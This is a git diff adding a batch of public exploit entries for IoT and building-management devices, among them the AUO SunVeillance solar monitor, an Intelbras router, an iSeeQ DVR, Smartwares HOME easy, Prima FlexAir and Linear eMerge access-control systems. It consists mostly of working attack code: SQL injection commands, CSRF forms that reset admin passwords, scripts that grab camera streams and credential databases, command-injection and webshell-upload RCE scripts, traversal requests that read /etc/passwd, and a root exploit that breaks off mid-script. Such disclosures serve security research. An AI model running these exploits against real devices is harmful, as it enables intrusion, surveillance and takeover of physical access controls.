new file mode 100644
index 000000000..adbd3ae74
--- /dev/null
+++ b/exploits/hardware/webapps/47542.txt
@@ -0,0 +1,31 @@
+# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
+# Date: 2019-10-24
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.auo.com/zh-TW
+# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
+# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
+# CVE: N/A
+
+# 1. Description:
+# AUO SunVeillance Monitoring System all versions prior to v1.1.9e that is vulnerable to SQL Injection.
+# The vulnerability can allow the attacker inject maliciously SQL command to the server which allows 
+# the attacker to read privileged data.
+
+# 2. Proof of Concept:
+
+(1) Access the sending mail page of AUO SunVeillance Monitoring System  (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication. 
+    There is a parameter, MailAdd, in mvc_send_mail.aspx.
+(2) Modify the value of parameter MailAdd with single quotation. The error messages contains oracle database information.
+(3) By using sqlmap tools, attacker can acquire the database list which in server side.
+
+cmd: sqlmap.py -u “https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=” -p MailAdd –dbs
+
+(4) Furthermore, there are a few SQL Injection vulnerabilities in other fields.
+
+picture_manage_mvc.aspx (parameter: plant_no)
+swapdl_mvc.aspx (parameter: plant_no)
+account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code)
+
+Thank you for your kind assistance.
+
+Luca
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47545.txt b/exploits/hardware/webapps/47545.txt
new file mode 100644
index 000000000..fe10fd940
--- /dev/null
+++ b/exploits/hardware/webapps/47545.txt
@@ -0,0 +1,26 @@
+Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
+Date: 2019-10-25
+Exploit Author: Prof. Joas Antonio
+Vendor Homepage: https://www.intelbras.com/pt-br/
+Software Link: http://en.intelbras.com.br/node/25896
+Version: 1.0.18
+Tested on: Windows
+CVE : N/A
+
+####################
+# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
+
+<html>
+  <body>
+    <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
+	<input type="hidden" name="GO" value="system_password.asp">
+	<input type="hidden" name="SYSPSC" value="0">
+      	<input class="text" type="password" name="SYSOPS" value="hack123"/> 
+	<input class="text" type="password" name="SYSPS" value="mrrobot"/> 
+	<input class="text" type="password" name="SYSPS2" value="mrrobot"/> 
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47562.sh b/exploits/hardware/webapps/47562.sh
new file mode 100755
index 000000000..c21ca9c26
--- /dev/null
+++ b/exploits/hardware/webapps/47562.sh
@@ -0,0 +1,67 @@
+# Title: iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure
+# Date: 2019-10-29
+# Author: LiquidWorm
+# Vendor:iSeeQ
+# Link: http://www.iseeq.co.kr
+# CVE: N/A
+
+#!/bin/bash
+#
+#
+# iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P (get_jpeg) Stream Disclosure
+#
+#
+# Vendor: iSeeQ
+# Product web page: http://www.iseeq.co.kr
+# Affected version: WH-H4 1.03R / 2.0.0.P
+#
+# Summary: The 4/8/16 channel hybrid standalone DVR delivers high quality
+# pictures which adopts high performance video processing chips and embedded
+# Linux system. This advanced video digital platform is very useful to identify
+# an object from a long distance.
+#
+# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
+# disclosure when get_jpeg script is called.
+#
+# Tested on: Boa/0.94.13
+#            PHP/7.0.22
+#            DVR Web Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5539
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5539.php
+#
+#
+# 28.10.2019
+#
+
+
+if [ "$#" -ne 2 ]; then
+    echo "Usage: $0 IP:PORT CHANNEL"
+    exit
+fi
+IP=$1
+CHANNEL=$2
+HOST="http://$IP/cgi-bin/get_jpeg?ch=$CHANNEL"
+STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$STATUS" == "404" ]; then
+    echo "Target not vulnerable!"
+    exit
+fi
+echo "Collecting snapshots..."
+for x in {1..10};
+    do echo -ne $x
+    curl "$HOST" -o seq-$x.jpg -#;
+    sleep 0.8
+    done
+echo -ne "\nDone."
+echo -ne "\nRendering video..."
+ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i seq-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p clip.mp4
+echo " done."
+echo -ne "\nRunning animation..."
+sleep 1
+cvlc clip.mp4 --verbose -1 -f vlc://quit
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47595.txt b/exploits/hardware/webapps/47595.txt
new file mode 100644
index 000000000..501e39b37
--- /dev/null
+++ b/exploits/hardware/webapps/47595.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: Smartwares
+# Product web page: https://www.smartwares.eu
+# Affected version: <=1.0.9
+# Advisory ID: ZSL-2019-5540
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php
+# CVE: N/A
+
+Summary: Home Easy/Smartwares are a range of products designed to remotely
+control your home using wireless technology. Home Easy/Smartwares is very
+simple to set up and allows you to operate your electrical equipment like
+lighting, appliances, heating etc.
+
+Desc: HOME easy suffers from information disclosure and client-side authentication
+bypass vulnerability through IDOR by navigating to several administrative web pages.
+This allowed disclosing an SQLite3 database file and location. Other functionalities
+are also accessible by disabling JavaScript in your browser, bypassing the client-side
+validation and redirection.
+
+Tested on: Boa/0.94.13
+
+/web-en/task.html
+/web-en/action_task.html
+/web-en/plan_task.html
+/web-en/room.html
+/web-en/room_set.html
+/web-en/room_set2.html
+/web-en/scene.html
+/web-en/scene_set.html
+/web-en/scene_set2.html
+/web-en/system.html
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47596.sh b/exploits/hardware/webapps/47596.sh
new file mode 100755
index 000000000..3c6e9dfab
--- /dev/null
+++ b/exploits/hardware/webapps/47596.sh
@@ -0,0 +1,62 @@
+# Title: Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: Smartwares
+# Product web page: https://www.smartwares.eu
+# Affected version: <=1.0.9
+# Advisory ID: ZSL-2019-5541
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php
+# CVE: N/A
+
+# Summary: Home Easy/Smartwares are a range of products designed to remotely
+# control your home using wireless technology. Home Easy/Smartwares is very
+# simple to set up and allows you to operate your electrical equipment like
+# lighting, appliances, heating etc.
+#
+# Desc: The home automation solution is vulnerable to unauthenticated database
+# backup download and information disclosure vulnerability. This can enable the
+# attacker to disclose sensitive and clear-text information resulting in authentication
+# bypass, session hijacking and full system control.
+
+#!/bin/bash
+#
+# ==============================================================================
+# root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004
+# Target: http://192.168.1.177:8004
+# Filename: 192.168.1.177:8004-16072019-db.sqlite
+# Username: admin
+# Password: s3cr3tP4ssw0rd
+# Version: 1.0.9
+# Sessions: 
+# ------------------------------------------------------------------
+# * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy
+# * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ
+# * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9
+# * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd
+# * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH
+# * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk
+# ------------------------------------------------------------------
+# ==============================================================================
+
+if [ "$#" -ne 1 ]; then
+    echo "Usage: $0 http://ip:port"
+    exit 0
+fi
+TARGET=$1
+CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then
+    echo "No juice."
+    exit 1
+fi
+echo "Target: "$TARGET
+FNAME=${TARGET:7}-$(date +"%d%m%Y")
+curl -s $TARGET/data.dat -o $FNAME-db.sqlite
+echo "Filename: $FNAME-db.sqlite"
+echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin
+echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111
+echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3")
+echo -ne "Sessions: \n"
+printf "%0.s-" {1..66}
+printf "\n"
+sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*"
+printf "%0.s-" {1..66} ; printf "\n\n"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47612.py b/exploits/hardware/webapps/47612.py
new file mode 100755
index 000000000..efca58499
--- /dev/null
+++ b/exploits/hardware/webapps/47612.py
@@ -0,0 +1,71 @@
+# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
+# Google Dork: NA
+# Date: 2018-09-06
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.primasystems.eu/
+# Software Link: https://primasystems.eu/flexair-access-control/
+# Version: 2.3.38
+# Tested on: NA
+# CVE : CVE-2019-7670
+
+#!/usr/bin/env python
+#
+# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
+# via Command Injection in SetNTPServer request, Server parameter.
+#
+# CVE: CVE-2019-7670
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+#
+# By Gjoko 'LiquidWorm' Krstic
+#
+# 18.01.2019
+#
+############################################################################
+#
+# $ python ntpcmdinj.py
+# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
+# [+] Example: python ntpcmdinj.py http://10.0.251.17:8080 10167847 whoami
+#
+# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 "uname -a"
+# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
+#
+# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 id
+# uid=0(root) gid=0(root) groups=0(root),10(wheel)
+#
+############################################################################
+#
+
+import requests
+import sys#####
+
+if len(sys.argv) < 4:
+    print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
+    print '[+] Example: python ntpcmdinj.py http://10.0.0.17:8080 10167847 whoami\n'
+    sys.exit()
+
+host = sys.argv[1]
+sessionid = sys.argv[2]
+commando = sys.argv[3]
+
+url = host+"/bin/sysfcgi.fx"
+
+headers = {"Session-ID"       : sessionid, # Muy importante!
+           "User-Agent"       : "Dj/Ole",
+           "Content-Type"     : "application/x-www-form-urlencoded; charset=UTF-8",
+           "Accept"           : "text/html, */*; q=0.01",
+           "Session-Pc"       : "2",
+           "X-Requested-With" : "XMLHttpRequest",
+           "Accept-Encoding"  : "gzip, deflate",
+           "Accept-Language"  : "en-US,en;q=0.9"}
+
+payload = ("<requests><request name=\"SetNTPServer\">"
+           "<param name=\"Server\" value=\"2.europe.p"
+           "ool.ntp.org;"+commando+">/www/pages/ap"
+           "p/images/logos/stage.txt|\"/></request></"
+           "requests>")
+
+requests.post(url, headers=headers, data=payload)
+
+e = requests.get(host+"/app/images/logos/stage.txt")
+print e.text
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47614.txt b/exploits/hardware/webapps/47614.txt
new file mode 100644
index 000000000..8bd57c804
--- /dev/null
+++ b/exploits/hardware/webapps/47614.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
+# Google Dork: NA
+# Date: 2018-09-06
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : CVE-2019-10846
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1
+
+username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email
+
+=======
+
+POST /cbas/index.php?m=auth&a=login HTTP/1.1
+
+username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
+
+=======
+
+GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47616.txt b/exploits/hardware/webapps/47616.txt
new file mode 100644
index 000000000..a0d052354
--- /dev/null
+++ b/exploits/hardware/webapps/47616.txt
@@ -0,0 +1,42 @@
+# Exploit Title: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
+# Google Dork: NA
+# Date: 2018-09-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 1.00-06
+# Tested on: NA
+# CVE : CVE-2019-7254
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+# PoC
+
+GET /?c=../../../../../../etc/passwd%00
+Host: 192.168.1.2
+
+root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:
+daemon:x:2:2:daemon:/sbin:
+adm:x:3:4:adm:/var/adm:
+lp:x:4:7:lp:/var/spool/lpd:
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:
+news:x:9:13:news:/var/spool/news:
+uucp:x:10:14:uucp:/var/spool/uucp:
+operator:x:11:0:operator:/root:
+games:x:12:100:games:/usr/games:
+gopher:x:13:30:gopher:/usr/lib/gopher-data:
+ftp:x:14:50:FTP User:/home/ftp:
+nobody:x:99:99:Nobody:/home/default:
+e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
+lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
+
+
+curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
+curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version
+curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue
+curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47618.txt b/exploits/hardware/webapps/47618.txt
new file mode 100644
index 000000000..3b1db643f
--- /dev/null
+++ b/exploits/hardware/webapps/47618.txt
@@ -0,0 +1,21 @@
+# Exploit Title: eMerge E3 1.00-06 - Privilege Escalation
+# Google Dork: NA
+# Date: 2018-09-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 1.00-06
+# Tested on: NA
+# CVE : CVE-2019-7254, CVE-2019-7259
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+# PoC
+# Escalate:
+
+curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1
+
+
+Disclose:
+curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47619.py b/exploits/hardware/webapps/47619.py
new file mode 100755
index 000000000..4dbd666f7
--- /dev/null
+++ b/exploits/hardware/webapps/47619.py
@@ -0,0 +1,60 @@
+# Exploit Title: eMerge E3 1.00-06 - Remote Code Execution
+# Google Dork: NA
+# Date: 2018-09-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 1.00-06
+# Tested on: NA
+# CVE : CVE-2019-7256
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+#!/usr/bin/env python
+#
+###################################################################
+# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ id
+# uid=1003(lighttpd) gid=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
+# Password: 
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ exit
+#
+# [+] Erasing read stage file and exiting...
+# [+] Done. Ba-bye!
+#
+###################################################################
+
+import requests
+import sys,os##
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+	print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
+	sys.exit()
+
+ipaddr = sys.argv[1]
+
+print
+while True:
+	try:
+		cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
+		execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60')
+		readreq = requests.get('http://'+ipaddr+'/test.txt')
+		print readreq.text
+		if cmd.strip() == 'exit':
+			print "[+] Erasing read stage file and exiting..."
+			requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
+			print "[+] Done. Ba-bye!\n"
+			break
+		else: continue
+	except Exception:
+		break
+
+sys.exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47620.txt b/exploits/hardware/webapps/47620.txt
new file mode 100644
index 000000000..d9a1330dd
--- /dev/null
+++ b/exploits/hardware/webapps/47620.txt
@@ -0,0 +1,53 @@
+# Exploit Title: eMerge E3 1.00-06 - Cross-Site Request Forgery 
+# Google Dork: NA
+# Date: 2018-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 1.00-06
+# Tested on: NA
+# CVE : CVE-2019-7262
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+# PoC
+# Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery
+
+<!-- CSRF Add Super User -->
+<html>
+  <body>
+   <form action="http://192.168.1.2/?c=webuser&m=insert" method="POST">
+     <input type="hidden" name="No" value="" />
+     <input type="hidden" name="ID" value="hax0r" />
+     <input type="hidden" name="Password" value="hax1n" />
+     <input type="hidden" name="Name" value="CSRF" />
+     <input type="hidden" name="UserRole" value="1" />
+     <input type="hidden" name="Language" value="en" />
+     <input type="hidden" name="DefaultPage" value="sitemap" />
+     <input type="hidden" name="DefaultFloorNo" value="1" />
+     <input type="hidden" name="DefaultFloorState" value="1" />
+     <input type="hidden" name="AutoDisconnectTime" value="24" />
+     <input type="submit" value="Add Super User" />
+   </form>
+  </body>
+</html>
+
+<!-- CSRF Change Admin Password -->
+<html>
+  <body>
+   <form action="http://192.168.1.2/?c=webuser&m=update" method="POST">
+     <input type="hidden" name="No" value="1" />
+     <input type="hidden" name="ID" value="admin" />
+     <input type="hidden" name="Password" value="backdoor" />
+     <input type="hidden" name="Name" value="admin" />
+     <input type="hidden" name="UserRole" value="1" />
+     <input type="hidden" name="Language" value="en" />
+     <input type="hidden" name="DefaultPage" value="sitemap" />
+     <input type="hidden" name="DefaultFloorNo" value="1" />
+     <input type="hidden" name="DefaultFloorState" value="1" />
+     <input type="hidden" name="AutoDisconnectTime" value="24" />
+     <input type="submit" value="Change Admin Password" />
+   </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47622.py b/exploits/hardware/webapps/47622.py
new file mode 100755
index 000000000..4c6e2dcb2
--- /dev/null
+++ b/exploits/hardware/webapps/47622.py
@@ -0,0 +1,89 @@
+# Exploit Title: eMerge E3 1.00-06 - Arbitrary File Upload
+# Google Dork: NA
+# Date: 2018-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 1.00-06
+# Tested on: NA
+# CVE : CVE-2019-7257
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+# PoC
+#####################################################################
+#
+# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
+# Starting exploit at 17.01.2019 13:04:17
+#
+# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
+# uid=1003(lighttpd) gid=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
+# Password: 
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
+#
+# [+] Deleting webshell.php file...
+# [+] Done!
+#
+#####################################################################
+
+import datetime
+import requests
+import sys#####
+import os######
+
+piton = os.path.basename(sys.argv[0])
+
+badge = "/badging/badge_layout_new_v0.php"
+shell = "/badging/bg/webshell.php"
+
+if len(sys.argv) < 2:
+	print "\n\x20\x20[*] Usage: "+piton+" <ipaddress:port>\n"
+	sys.exit()
+
+ipaddr = sys.argv[1]
+vremetodeneska = datetime.datetime.now()
+
+print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
+print
+
+while True:
+    try:
+        target = "http://"+ipaddr+badge
+
+        headers = {"User-Agent": "Brozilla/16.0",
+                   "Accept": "anything",
+                   "Accept-Language": "mk-MK,mk;q=0.7",
+                   "Accept-Encoding": "gzip, deflate",
+                   "Content-Type": "multipart/form-data; boundary=----j",
+                   "Connection": "close"}
+
+        payload = ("------j\r\nContent-Disposition: form-da"
+                   "ta; name=\"layout_name\"\r\n\r\nwebshel"
+                   "l.php\r\n------j\r\nContent-Disposition"
+                   ": form-data; name=\"bg\"; filename=\"we"
+                   "bshell.php\"\r\nContent-Type: applicati"
+                   "on/octet-stream\r\n\r\n<?\nif($_GET['cm"
+                   "d']) {\n  system($_GET['cmd']);\n  }\n?"
+                   ">\n\r\n------j--\r\n")
+
+        requests.post(target, headers=headers, data=payload)
+
+        cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
+        execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
+        print execute.text
+        if cmd.strip() == "exit":
+            print "[+] Deleting webshell.php file..."
+            requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
+            print "[+] Done!\n"
+            break
+        else: continue
+    except Exception:
+        print "Error!"
+        break
+
+sys.exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47623.txt b/exploits/hardware/webapps/47623.txt
new file mode 100644
index 000000000..9b22eef43
--- /dev/null
+++ b/exploits/hardware/webapps/47623.txt
@@ -0,0 +1,15 @@
+# Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
+# Google Dork: NA
+# Date: 2018-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 1.00-06
+# Tested on: NA
+# CVE : CVE-2019-7255
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+# PoC:
+GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47624.sh b/exploits/hardware/webapps/47624.sh
new file mode 100755
index 000000000..d36529ca9
--- /dev/null
+++ b/exploits/hardware/webapps/47624.sh
@@ -0,0 +1,278 @@
+# Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution
+# Google Dork: NA
+# Date: 2018-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 4.6.07
+# Tested on: NA
+# CVE : CVE-2019-7269
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+# PoC:
+#!/bin/bash
+#
+# Full remote code execution exploit for the Linear eMerge50P/5000P 4.6.07
+# Including escalating to root privileges
+# CVE: CVE-2019-7266, CVE-2019-7267, CVE-2019-7268, CVE-2019-7269
+# Advisory: https://applied-risk.com/resources/ar-2019-006
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# 
+# This script is tested on macOS 10.13.6
+# by Sipke Mellema
+#
+# usage: ./sploit.sh http://target
+#
+##########################################################################
+#
+# $ ./sploit.sh http://192.168.1.1
+#
+#
+#	   .         .         .         .         .
+#	 .          .         .          .          . 
+#	|          |Linear eMerge50 4.6.07|          |
+#	|          |                      |          |
+#	|          |Remote code executionz|          |
+#	|          | With priv escalation |          |
+#	|          |    Get yours today   |          |
+#	|          |          |           |          |
+#	|          |        Boomch        |          |
+#	 .          .         .          .          . 
+#	      .        .        .        .        . 
+#
+#
+#
+# [*] Checking connection to the target..
+# [V] We can connect to the server
+# [*] Checking if already infected..
+# [V] Target not yet infected..
+# [*] Creating custom session file..
+# [*] Uploading custom session file..
+# [V] Session file active!
+# [*] Retrieving CSRF token..
+# [V] CSRF_TOKEN: AI1R5ebMTZXL8Vu6RyhcTuavuaEbZvy9
+# [*] Uploading file..
+# [V] File successfully uploaded
+# [*] Writing new config..
+# [V] Wrote new config, restarting device
+# [*] Looks good! Waiting for device to reboot..
+# [V] Executing: whoami..
+# [V] Username found: root
+# [*] Cleaning up uploaded files..
+# [*] Removing fake backup file..
+# [*] Removing shell script..
+# [*] Files removed
+#
+# [*] If that worked, you can how execute commands via your cookie
+# [*] The URL is: http://192.168.1.1/cgi-bin/websrunnings.cgi
+# [*] Or type commands below ('quit' to quit)
+#
+# root@http://192.168.1.1$ id
+# uid=0(root) gid=0(root) groups=0(root)
+# root@http://192.168.1.1$ quit
+#
+##########################################################################
+
+RED='\033[0;31m'; BLUE='\033[0;34m'; GREEN='\033[0;32m'; NC='\033[0m'
+BANNER="
+\t   .         .         .         .         .
+\t .          .         .          .          . 
+\t|          |${BLUE}Linear eMerge50 4.6.07${RED}|          |
+\t|          |${BLUE}                      ${RED}|          |
+\t|          |${BLUE}Remote code executionz${RED}|          |
+\t|          |${BLUE} With priv escalation ${RED}|          |
+\t|          |${BLUE}    Get yours today   ${RED}|          |
+\t|          |${BLUE}          |           ${RED}|          |
+\t|          |${BLUE}        Boomch        ${RED}|          |
+\t .          .         .          .          . 
+\t      .        .        .        .        . 
+${NC}
+"
+printf "\n${RED}${BANNER}\n\n"
+
+function echo_green {
+  printf "${GREEN}[*] $@${NC}\n"
+}
+function echo_blue  { 
+  printf "${BLUE}[V] $@${NC}\n" 
+}
+function echo_red   { 
+  printf "${RED}[-] $@${NC}\n"  
+}
+
+function show_usage {
+  echo -en "Usage: ./sploit.sh
+"
+}
+
+
+# check arguments
+if [ $# -eq 0 ]
+  then
+    echo_red "Incorrect parameters"
+    show_usage
+    exit
+fi
+
+
+# Define global paramters
+VULN_HOST=$1
+TEST_CMD="whoami"
+
+# ========================= Vuln 2: Session ID allows path traversal
+# Path traversal to session file injected as backup file
+SESSION_ID="../web/upload/system/backup.upg"
+
+
+function run_remote_shell {
+  # shell is in the context of the lower privileged user called s2user
+  # but the user has sudo rights
+  # ========================= Vuln 5: Webserver runs as root
+  TEST_CMD=''
+  while read -p "${SPLOT_USERNAME}@${VULN_HOST}$ " TEST_CMD && [ "${TEST_CMD}" != "quit" ] ; do
+    curl -s -k -H "Cookie: sudo $TEST_CMD" ${VULN_HOST}/cgi-bin/websrunnings.cgi
+    echo ""
+  done
+}
+
+# ========================= Pre-exploit checks
+
+# check connection
+echo_green "Checking connection to the target.."
+RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST} -o /dev/null --connect-timeout 3 --max-time 5`
+if [ "$RESULT" != "200" ] ; 
+then
